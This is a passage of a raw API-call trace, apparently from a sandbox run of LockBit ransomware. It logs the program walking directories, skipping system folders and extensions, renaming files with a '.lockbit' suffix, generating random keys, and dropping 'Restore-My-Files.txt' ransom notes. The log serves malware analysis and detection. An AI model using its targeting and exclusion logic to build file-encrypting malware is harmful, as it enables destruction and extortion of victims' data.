lstrcmpiW (lpString1="10", lpString2="Microsoft.NET") returned -1 [0097.529] lstrcmpiW (lpString1="10", lpString2="microsoft shared") returned -1 [0097.529] lstrcmpiW (lpString1="10", lpString2="Internet Explorer") returned -1 [0097.529] lstrcmpiW (lpString1="10", lpString2="common files") returned -1 [0097.529] lstrcmpiW (lpString1="10", lpString2="opera") returned -1 [0097.529] lstrcmpiW (lpString1="10", lpString2="Windows Journal") returned -1 [0097.529] wsprintfW (in: param_1=0x3d6c550, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10") returned 57 [0097.529] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*") returned 59 [0097.529] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6bd48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6bd48) returned 0x55fe38 [0097.541] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0097.541] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.541] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0097.541] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0097.541] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cartridges", cAlternateFileName="CARTRI~1")) returned 1 [0097.541] lstrcmpiW (lpString1=".", lpString2="Cartridges") returned -1 [0097.541] lstrcmpiW (lpString1="..", lpString2="Cartridges") returned -1 [0097.541] lstrcmpiW (lpString1="Cartridges", lpString2="$windows.~bt") returned 1 [0097.541] lstrcmpiW (lpString1="Cartridges", lpString2="intel") returned -1 [0097.541] lstrcmpiW (lpString1="Cartridges", lpString2="msocache") returned -1 [0097.541] lstrcmpiW (lpString1="Cartridges", lpString2="$recycle.bin") returned 1 [0097.541] lstrcmpiW (lpString1="Cartridges", lpString2="$windows.~ws") returned 1 [0097.541] lstrcmpiW (lpString1="Cartridges", lpString2="tor browser") returned -1 [0097.541] lstrcmpiW (lpString1="Cartridges", lpString2="boot") returned 1 [0097.541] lstrcmpiW (lpString1="Cartridges", lpString2="system volume information") returned -1 [0097.541] lstrcmpiW (lpString1="Cartridges", lpString2="perflogs") returned -1 [0097.541] lstrcmpiW (lpString1="Cartridges", lpString2="google") returned -1 [0097.541] lstrcmpiW (lpString1="Cartridges", lpString2="application data") returned 1 [0097.541] lstrcmpiW (lpString1="Cartridges", lpString2="windows") returned -1 [0097.541] lstrcmpiW (lpString1="Cartridges", lpString2="windows.old") returned -1 [0097.541] lstrcmpiW (lpString1="Cartridges", lpString2="appdata") returned 1 [0097.542] lstrcmpiW (lpString1="Cartridges", lpString2="Windows nt") returned -1 [0097.542] lstrcmpiW (lpString1="Cartridges", lpString2="Msbuild") returned -1 [0097.542] lstrcmpiW (lpString1="Cartridges", lpString2="Microsoft") returned -1 [0097.542] lstrcmpiW (lpString1="Cartridges", lpString2="All users") returned 1 [0097.542] lstrcmpiW (lpString1="Cartridges", lpString2="mozilla") returned -1 [0097.542] lstrcmpiW (lpString1="Cartridges", lpString2="Microsoft.NET") returned -1 [0097.542] lstrcmpiW (lpString1="Cartridges", lpString2="microsoft shared") returned -1 [0097.542] lstrcmpiW (lpString1="Cartridges", lpString2="Internet Explorer") returned -1 [0097.542] lstrcmpiW (lpString1="Cartridges", lpString2="common files") returned -1 [0097.542] lstrcmpiW (lpString1="Cartridges", lpString2="opera") returned -1 [0097.542] lstrcmpiW (lpString1="Cartridges", lpString2="Windows Journal") returned -1 [0097.542] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned 68 [0097.542] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*") returned 70 [0097.542] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0097.554] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0097.554] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3d6ffc4, cFileName="..", cAlternateFileName="")) returned 1 [0097.554] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0097.554] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0097.554] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x4360, dwReserved0=0x0, dwReserved1=0x3d6ffc4, cFileName="as80.xsl", cAlternateFileName="")) returned 1 [0097.554] lstrcmpiW (lpString1=".", lpString2="as80.xsl") returned -1 [0097.554] lstrcmpiW (lpString1="..", lpString2="as80.xsl") returned -1 [0097.554] PathFindExtensionW (pszPath="as80.xsl") returned=".xsl" [0097.554] lstrcmpiW (lpString1=".386", lpString2=".xsl") returned -1 [0097.554] lstrcmpiW (lpString1=".cmd", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".exe", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".ani", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".adv", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".theme", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".msi", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".msp", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".com", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".diagpkg", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".nls", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".diagcab", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".lock", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".ocx", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".mpa", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".cpl", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".mod", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".hta", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".icns", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".prf", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".rtp", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".diagcfg", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".msstyles", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".bin", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".hlp", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".shs", lpString2=".xsl") returned -1 [0097.555] lstrcmpiW (lpString1=".drv", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".wpx", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".bat", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".rom", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".msc", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".spl", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".ps1", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".msu", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".ics", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".key", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".mp3", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".reg", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".dll", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".ini", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".idx", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".sys", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".hlp", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".ico", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".lnk", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".rdp", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1=".lockbit", lpString2=".xsl") returned -1 [0097.556] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="as80.xsl") returned 1 [0097.556] lstrcmpiW (lpString1="ntldr", lpString2="as80.xsl") returned 1 [0097.556] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="as80.xsl") returned 1 [0097.556] lstrcmpiW (lpString1="bootsect.bak", lpString2="as80.xsl") returned 1 [0097.556] lstrcmpiW (lpString1="autorun.inf", lpString2="as80.xsl") returned 1 [0097.556] lstrcmpiW (lpString1="thumbs.db", lpString2="as80.xsl") returned 1 [0097.557] lstrcmpiW (lpString1="iconcache.db", lpString2="as80.xsl") returned 1 [0097.557] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\") returned="" [0097.557] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned=".xsl" [0097.557] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0097.557] lstrcmpiW (lpString1=".7z", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".ckp", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".dacpac", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".db", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".db-shm", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".db-wal", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".db3", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".dbc", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".dbs", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".dbt", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".dbv", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".frm", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".mdf", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".mrg", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".mwb", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".myd", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".ndf", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".qry", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".sdb", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".sdf", lpString2=".xsl") returned -1 [0097.557] lstrcmpiW (lpString1=".sql", lpString2=".xsl") returned -1 [0097.558] lstrcmpiW (lpString1=".sqlite", lpString2=".xsl") returned -1 [0097.558] lstrcmpiW (lpString1=".sqlite3", lpString2=".xsl") returned -1 [0097.558] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xsl") returned -1 [0097.558] lstrcmpiW (lpString1=".tmd", lpString2=".xsl") returned -1 [0097.558] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.lockbit") returned 85 [0097.558] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0097.558] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0097.558] malloc (_Size=0x40068) returned 0x3ef0008 [0097.559] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=17248) returned 1 [0097.559] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.562] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0097.562] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.565] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0097.565] ReadFile (in: hFile=0x3b4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0097.585] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0097.585] malloc (_Size=0xc0) returned 0x77d800 [0097.585] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0097.586] free (_Block=0x77d800) [0097.586] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned 1 [0097.586] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Restore-My-Files.txt") returned 89 [0097.586] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1194 [0097.587] CreateIoCompletionPort (FileHandle=0x1194, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0097.587] malloc (_Size=0x40068) returned 0x3d70048 [0097.587] WriteFile (in: hFile=0x1194, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0097.588] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x5ed7d9f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x4932, dwReserved0=0x0, dwReserved1=0x3d6ffc4, cFileName="as90.xsl", cAlternateFileName="")) returned 1 [0097.588] lstrcmpiW (lpString1=".", lpString2="as90.xsl") returned -1 [0097.588] lstrcmpiW (lpString1="..", lpString2="as90.xsl") returned -1 [0097.588] PathFindExtensionW (pszPath="as90.xsl") returned=".xsl" [0097.588] lstrcmpiW (lpString1=".386", lpString2=".xsl") returned -1 [0097.588] lstrcmpiW (lpString1=".cmd", lpString2=".xsl") returned -1 [0097.588] lstrcmpiW (lpString1=".exe", lpString2=".xsl") returned -1 [0097.588] lstrcmpiW (lpString1=".ani", lpString2=".xsl") returned -1 [0097.588] lstrcmpiW (lpString1=".adv", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".theme", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".msi", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".msp", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".com", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".diagpkg", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".nls", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".diagcab", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".lock", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".ocx", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".mpa", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".cpl", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".mod", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".hta", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".icns", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".prf", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".rtp", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".diagcfg", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".msstyles", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".bin", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".hlp", lpString2=".xsl") returned -1 [0097.589] lstrcmpiW (lpString1=".shs", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".drv", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".wpx", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".bat", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".rom", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".msc", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".spl", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".ps1", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".msu", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".ics", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".key", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".mp3", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".reg", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".dll", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".ini", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".idx", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".sys", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".hlp", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".ico", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".lnk", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".rdp", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1=".lockbit", lpString2=".xsl") returned -1 [0097.590] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="as90.xsl") returned 1 [0097.591] lstrcmpiW (lpString1="ntldr", lpString2="as90.xsl") returned 1 [0097.591] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="as90.xsl") returned 1 [0097.591] lstrcmpiW (lpString1="bootsect.bak", lpString2="as90.xsl") returned 1 [0097.591] lstrcmpiW (lpString1="autorun.inf", lpString2="as90.xsl") returned 1 [0097.591] lstrcmpiW (lpString1="thumbs.db", lpString2="as90.xsl") returned 1 [0097.591] lstrcmpiW (lpString1="iconcache.db", lpString2="as90.xsl") returned 1 [0097.591] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\") returned="" [0097.591] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned=".xsl" [0097.591] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0097.591] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0097.591] lstrcmpiW (lpString1=".7z", lpString2=".xsl") returned -1 [0097.591] lstrcmpiW (lpString1=".ckp", lpString2=".xsl") returned -1 [0097.591] lstrcmpiW (lpString1=".dacpac", lpString2=".xsl") returned -1 [0097.591] lstrcmpiW (lpString1=".db", lpString2=".xsl") returned -1 [0097.591] lstrcmpiW (lpString1=".db-shm", lpString2=".xsl") returned -1 [0097.591] lstrcmpiW (lpString1=".db-wal", lpString2=".xsl") returned -1 [0097.591] lstrcmpiW (lpString1=".db3", lpString2=".xsl") returned -1 [0097.591] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0097.592] lstrcmpiW (lpString1=".dbc", lpString2=".xsl") returned -1 [0097.592] lstrcmpiW (lpString1=".dbs", lpString2=".xsl") returned -1 [0097.592] lstrcmpiW (lpString1=".dbt", lpString2=".xsl") returned -1 [0097.592] lstrcmpiW (lpString1=".dbv", lpString2=".xsl") returned -1 [0097.592] lstrcmpiW (lpString1=".frm", lpString2=".xsl") returned -1 [0097.592] lstrcmpiW (lpString1=".mdf", lpString2=".xsl") returned -1 [0097.592] lstrcmpiW (lpString1=".mrg", lpString2=".xsl") returned -1 [0097.592] lstrcmpiW (lpString1=".mwb", lpString2=".xsl") returned -1 [0097.592] lstrcmpiW (lpString1=".myd", lpString2=".xsl") returned -1 [0097.592] lstrcmpiW (lpString1=".ndf", lpString2=".xsl") returned -1 [0097.592] lstrcmpiW (lpString1=".qry", lpString2=".xsl") returned -1 [0097.592] lstrcmpiW (lpString1=".sdb", lpString2=".xsl") returned -1 [0097.592] lstrcmpiW (lpString1=".sdf", lpString2=".xsl") returned -1 [0097.592] lstrcmpiW (lpString1=".sql", lpString2=".xsl") returned -1 [0097.592] lstrcmpiW (lpString1=".sqlite", lpString2=".xsl") returned -1 [0097.592] lstrcmpiW (lpString1=".sqlite3", lpString2=".xsl") returned -1 [0097.592] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xsl") returned -1 [0097.592] lstrcmpiW (lpString1=".tmd", lpString2=".xsl") returned -1 [0097.592] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.lockbit") returned 85 [0097.592] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1194 [0097.603] CreateIoCompletionPort (FileHandle=0x1194, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0097.603] malloc (_Size=0x40068) returned 0x3d70048 [0097.603] GetFileSizeEx (in: hFile=0x1194, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=18738) returned 1 [0097.603] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.605] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0097.606] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.608] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0097.608] ReadFile (in: hFile=0x1194, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0097.619] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0097.619] malloc (_Size=0xc0) returned 0x77d800 [0097.619] NtSetInformationFile (FileHandle=0x1194, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0097.620] free (_Block=0x77d800) [0097.620] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned 1 [0097.620] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Restore-My-Files.txt") returned 89 [0097.620] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.620] FindNextFileW (in: 